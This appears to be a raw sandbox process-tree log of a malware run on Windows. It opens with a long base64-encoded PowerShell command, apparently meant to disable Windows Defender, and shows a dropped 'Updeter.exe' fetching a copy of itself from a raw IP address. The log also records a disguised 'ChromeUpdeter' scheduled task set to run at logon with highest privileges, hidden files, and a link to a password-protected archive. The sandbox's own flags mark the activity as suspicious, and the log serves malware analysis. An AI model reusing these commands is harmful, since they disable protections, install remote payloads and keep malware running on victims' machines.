"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ACgBzAHAAIAAnAEgASwBDAFUAOgBcAFYAbwBsAGEAdABpAGwAZQAgAEUAbgB2AGkAcgBvAG4AbQBlAG4AdAAnACAAJwBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAJwAgAEAAJwAKAGkAZgAgACgAJAAoAHMAYwAuAGUAeABlACAAcQBjACAAdwBpAG4AZABlAGYAZQBuAGQAKQAgAC0AbABpAGsAZQAgACcAKgBUAE8ARwBHAEwARQAqACcAKQAgAHsAJABUAE8ARwBHAEwARQA9ADcAOwAkAEsARQBFAFAAPQA2ADsAJABBAD0AJwBFAG4AYQBiAGwAZQAnADsAJABTAD0AJwBPAEYARgAnAH0AZQBsAHMAZQB7ACQAVABPAEcARwBMAEUAPQA2ADsAJABLAEUARQBQAD0ANwA7ACQAQQA9ACcARABpAHMAYQBiAGwAZQAnADsAJABTAD0AJwBPAE4AJwB9AAoACgBpAGYAIAAoACQAZQBuAHYAOgAxACAALQBuAGUAIAA2ACAALQBhAG4AZAAgACQAZQBuAHYAOgAxACAALQBuAGUAIAA3ACkAIAB7ACAAJABlAG4AdgA6ADEAPQAkAFQATwBHAEcATABFACAAfQAKAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQAKAAoAJABuAG8AdABpAGYAPQAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAXABTAGUAdAB0AGkAbgBnAHMAXABXAGkAbgBkAG8AdwBzAC4AUwB5AHMAdABlAG0AVABvAGEAcwB0AC4AUwBlAGMAdQByAGkAdAB5AEEAbgBkAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAnAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAACgBzAHAAIAAkAG4AbwB0AGkAZgAgAEUAbgBhAGIAbABlAGQAIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZgAgACgAJABUAE8ARwBHAEwARQAgAC0AZQBxACAANwApACAAewByAHAAIAAkAG4AbwB0AGkAZgAgAEUAbgBhAGIAbABlAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAB9AAoACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAAoAJABiAHAAYQBzAHMAPQAkAGIAYQBmAGYAbABpAG4AZwAuAEcAZQB0AFQAYQBzAGsAKAAnAFMAaQBsAGUAbgB0AEMAbABlAGEAbgB1AHAAJwApADsAIAAkAGYAbABhAHcAPQAkAGIAcABhAHMAcwAuAEQAZQBmAGkAbgBpAHQAaQBvAG4ACgAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ACgAKACQAcgA9AFsAYwBoAGEAcgBdADEAMwA7ACAAJABuAGYAbwA9AFsAYwBoAGEAcgBdADMAOQArACQAcgArACcAIAAoAFwAIAAgACAALwApACcAKwAkAHIAKwAnACgAIAAqACAALgAgACoAIAApACAAIABBACAAbABpAG0AaQB0AGUAZAAgAGEAYwBjAG8AdQBuAHQAIABwAHIAbwB0AGUAYwB0AHMAIAB5AG8AdQAgAGYAcgBvAG0AIABVAEEAQwAgAGUAeABwAGwAbwBpAHQAcwAnACsAJAByACsAJwAgACAAIAAgAGAAYABgACcAKwAkAHIAKwBbAGMAaABhAHIAXQAzADkACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcACgAkAHMAYwByAGkAcAB0ACsAPQAnADsAaQBlAHgAKAAoAGcAcAAgAFIAZQBnAGkAcwB0AHIAeQA6ADoASABLAEUAWQBfAFUAcwBlAHIAcwBcAFMALQAxAC0ANQAtADIAMQAqAFwAVgBvAGwAYQB0AGkAbABlACoAIABUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAIAAtAGUAYQAgADAAKQBbADAAXQAuAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgApAH0AJwA7ACAAJABjAG0AZAA9ACcAcABvAHcAZQByAHMAaABlAGwAbAAgACcAKwAkAHMAYwByAGkAcAB0AAoACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewAKACAAIABzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxADsAIABiAHIAZQBhAGsACgB9AAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsACgAgACAAaQBmACAAKAAkAGYAbABhAHcALgBBAGMAdABpAG8AbgBzAC4ASQB0AGUAbQAoADEAKQAuAFAAYQB0AGgAIAAtAGkAbgBvAHQAbABpAGsAZQAgACcAKgB3AGkAbgBkAGkAcgAqACcAKQB7AHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawB9AAoAIAAgAHMAcAAgAGgAawBjAHUAOgBcAGUAbgB2AGkAcgBvAG4AbQBlAG4AdAAgAHcAaQBuAGQAaQByACAAJAAoACcAcABvAHcAZQByAHMAaABlAGwAbAAgACcAKwAkAHMAYwByAGkAcAB0ACsAJwAgACMAJwApAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ACgAgACAAaQBmACgAZwBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAKQB7AHIAcAAgAGgAawBjAHUAOgBcAGUAbgB2AGkAcgBvAG4AbQBlAG4AdAAgAHcAaQBuAGQAaQByACAALQBlAGEAIAAwADsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQB9ADsAYgByAGUAYQBrAAoAfQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AAoAIAAgACQAQQA9AFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuACIARABlAGYAYABpAG4AZQBEAHkAbgBhAG0AaQBjAEEAcwBzAGUAbQBiAGwAeQAiACgAMQAsADEAKQAuACIARABlAGYAYABpAG4AZQBEAHkAbgBhAG0AaQBjAE0AbwBkAHUAbABlACIAKAAxACkAOwAkAEQAPQBAACgAKQA7ADAALgAuADUAfAAlAHsAJABEACsAPQAkAEEALgAiAEQAZQBmAGAAaQBuAGUAVAB5AHAAZQAiACgAJwBBACcAKwAkAF8ALAAKACAAIAAxADEANwA5ADkAMQAzACwAWwBWAGEAbAB1AGUAVAB5AHAAZQBdACkAfQAgADsANAAsADUAfAAlAHsAJABEACsAPQAkAEQAWwAkAF8AXQAuACIATQBhAGsAYABlAEIAeQBSAGUAZgBUAHkAcABlACIAKAApAH0AIAA7ACQASQA9AFsASQBuAHQAMwAyAF0AOwAkAEoAPQAiAEkAbgB0AGAAUAB0AHIAIgA7ACQAUAA9ACQASQAuAG0AbwBkAHUAbABlAC4ARwBlAHQAVAB5AHAAZQAoACIAUwB5AHMAdABlAG0ALgAkAEoAIgApADsAIAAkAEYAPQBAACgAMAApAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQAKACAAIAAkAFMAPQBbAFMAdAByAGkAbgBnAF0AOwAgACQAOQA9ACQARABbADAAXQAuACIARABlAGYAYABpAG4AZQBQAEkAbgB2AG8AawBlAE0AZQB0AGgAbwBkACIAKAAnAEMAcgBlAGEAdABlAFAAcgBvAGMAZQBzAHMAJwAsACIAawBlAHIAbgBlAGwAYAAzADIAIgAsADgAMgAxADQALAAxACwAJABJACwAQAAoACQAUwAsACQAUwAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQAUwAsACQARABbADYAXQAsACQARABbADcAXQApACwAMQAsADQAKQAKACAAIAAxAC4ALgA1AHwAJQB7ACQAawA9ACQAXwA7ACQAbgA9ADEAOwAkAEYAWwAkAF8AXQB8ACUAewAkADkAPQAkAEQAWwAkAGsAXQAuACIARABlAGYAYABpAG4AZQBGAGkAZQBsAGQAIgAoACcAZgAnACsAJABuACsAKwAsACQAXwAsADYAKQB9AH0AOwAkAFQAPQBAACgAKQA7ADAALgAuADUAfAAlAHsAJABUACsAPQAkAEQAWwAkAF8AXQAuACIAQwByAGAAZQBhAHQAZQBUAHkAcABlACIAKAApADsAJABaAD0AWwB1AGkAbgB0AHAAdAByAF0AOgA6AHMAaQB6AGUACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AAoAIAAgACQAVwBQAD0AJABIAC4AIgBHAGUAdABgAE0AZQB0AGgAbwBkACIAKAAiAFcAcgBpAHQAZQAkAEoAIgAsAFsAdAB5AHAAZQBbAF0AXQAoACQASgAsACQASgApACkAOwAgACQASABHAD0AJABIAC4AIgBHAGUAdABgAE0AZQB0AGgAbwBkACIAKAAiAEEAbABsAG8AYwBIAGAARwBsAG8AYgBhAGwAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAGkAbgB0ADMAMgAnACkAOwAgACQAdgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFoAKQAKACAAIAAnAFQAcgB1AHMAdABlAGQASQBuAHMAdABhAGwAbABlAHIAJwAsACcAbABzAGEAcwBzACcAfAAlAHsAaQBmACgAIQAkAHAAbgApAHsAbgBlAHQAMQAgAHMAdABhAHIAdAAgACQAXwAgADIAPgAmADEAIAA+ACQAbgB1AGwAbAA7ACQAcABuAD0AWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AFAAcgBvAGMAZQBzAHMAZQBzAEIAeQBOAGEAbQBlACgAJABfACkAWwAwAF0AOwB9AH0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQAKACAAIAAkAFQAMgAuAGYAMgA9ADEAOwAkAFQAMgAuAGYAMwA9ADEAOwAkAFQAMgAuAGYANAA9ADEAOwAkAFQAMgAuAGYANgA9ACQAVAAxADsAJABUADMALgBmADEAPQAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsANABdACkAOwAkAFQANAAuAGYAMQA9ACQAVAAzADsAJABUADQALgBmADIAPQAkAEgARwAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABTAFoALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAVABbADIAXQApACkACgAgACAAJABIAC4AIgBHAGUAdABgAE0AZQB0AGgAbwBkACIAKAAiAFMAdAByAHUAYwB0AHUAcgBlAFQAbwBgAFAAdAByACIALABbAHQAeQBwAGUAWwBdAF0AKAAkAEQAWwAyAF0ALAAkAEoALAAnAGIAbwBvAGwAZQBhAG4AJwApACkALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAoACQAVAAyAC0AYQBzACAAJABEAFsAMgBdACkALAAkAFQANAAuAGYAMgAsACQAZgBhAGwAcwBlACkAKQA7ACQAdwBpAG4AZABvAHcAPQAwAHgAMABFADAAOAAwADYAMAAwAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawAKAH0ACgAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAAoAJwAgAFMAZQBjAHUAcgBpAHQAeQAgAEMAZQBuAHQAZQByAFwATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAnACwAJwBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAsACcAXABNAHAARQBuAGcAaQBuAGUAJwAsACcAXABTAHAAeQBuAGUAdAAnACwAJwBcAFIAZQBhAGwALQBUAGkAbQBlACAAUAByAG8AdABlAGMAdABpAG8AbgAnACAAfAAlACAAewBuAGkAIAAoACQAdwBkAHAAKwAkAF8AKQAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAfQAKAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABTAHkAcwB0AGUAbQAnACAARQBuAGEAYgBsAGUAUwBtAGEAcgB0AFMAYwByAGUAZQBuACAAMAAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAbgBlAHQAMQAgAHMAdABvAHAAIAB3AGkAbgBkAGUAZgBlAG4AZAAKAHMAYwAuAGUAeABlACAAYwBvAG4AZgBpAGcAIAB3AGkAbgBkAGUAZgBlAG4AZAAgAGQAZQBwAGUAbgBkAD0AIABSAHAAYwBTAHMALQBUAE8ARwBHAEwARQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAKAHMAdABhAHIAdAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACsAJwBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAHAAQwBtAGQAUgB1AG4ALgBlAHgAZQAnACkAIAAtAEEAcgBnACAAJwAtAEQAaQBzAGEAYgBsAGUAUwBlAHIAdgBpAGMAZQAnACAALQB3AGkAbgAgADEACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABtAHAAZQBuAGcAaQBuAGUAZABiAC4AZABiACcAKQAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwACAAIAAgACAAIAAgACAAIAAgACAAIAAjACMAIABDAG8AbQBtAGUAbgB0AGUAZAAgAD0AIABrAGUAZQBwACAAcwBjAGEAbgAgAGgAaQBzAHQAbwByAHkACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAKACcAQAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwADsAIABpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkACgAjAC0AXwAtACMA
8⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
PID:2428

C:\Windows\SysWOW64\sc.exe
"C:\Windows\system32\sc.exe" qc windefend
9⤵
- Launches sc.exe
PID:4864

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
9⤵
PID:3076

C:\Windows\SysWOW64\whoami.exe
"C:\Windows\system32\whoami.exe" /groups
9⤵
- Suspicious use of AdjustPrivilegeToken
PID:4772

C:\Windows\SysWOW64\net1.exe
"C:\Windows\system32\net1.exe" start TrustedInstaller
9⤵
PID:1968

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\Updeter.exe"' & exit
8⤵
PID:3984

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\Updeter.exe"'
9⤵
- Suspicious use of AdjustPrivilegeToken
PID:2920

C:\Users\Admin\AppData\Local\Temp\Updeter.exe
"C:\Users\Admin\AppData\Local\Temp\Updeter.exe"
10⤵
- Executes dropped EXE
- Checks computer location settings
PID:3536

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F433.tmp\F434.tmp\F435.bat C:\Users\Admin\AppData\Local\Temp\Updeter.exe"
11⤵
PID:3284

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -w Hidden -ExecutionPolicy Bypass -c "Invoke-WebRequest -URI "http://20.127.168.10/assets/Updeter.exe" -OutFile "C:\Users\Admin\AppData\Roaming/Updeter.exe"
12⤵
PID:2868

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -w Hidden -ExecutionPolicy Bypass -c "schtasks /create /tn ChromeUpdeter /tr "C:\Users\Admin\AppData\Roaming/Updeter.exe" /sc onlogon /rl highest"
12⤵
- Suspicious use of AdjustPrivilegeToken
PID:2316

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /tn ChromeUpdeter /tr C:\Users\Admin\AppData\Roaming/Updeter.exe /sc onlogon /rl highest
13⤵
- Blocklisted process makes network request
- Creates scheduled task(s)
- Suspicious use of AdjustPrivilegeToken
PID:2868

C:\Windows\system32\timeout.exe
timeout /t 30 /nobreak
12⤵
- Delays execution with timeout.exe
PID:4776

C:\Windows\system32\attrib.exe
attrib +S +H C:\Users\Admin\AppData\Roaming\*.exe
12⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4684

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/qif3gi2emfmv5cg/password_is_eulen.rar/file
4⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1616

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb5db046f8,0x7ffb5db04708,0x7ffb5db04718
5⤵
PID:4796

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,10049205917950384665,2435861330879364230,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
5⤵
PID:2784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,10049205917950384665,2435861330879364230,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2424 /prefetch:3
5⤵
PID:5072

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
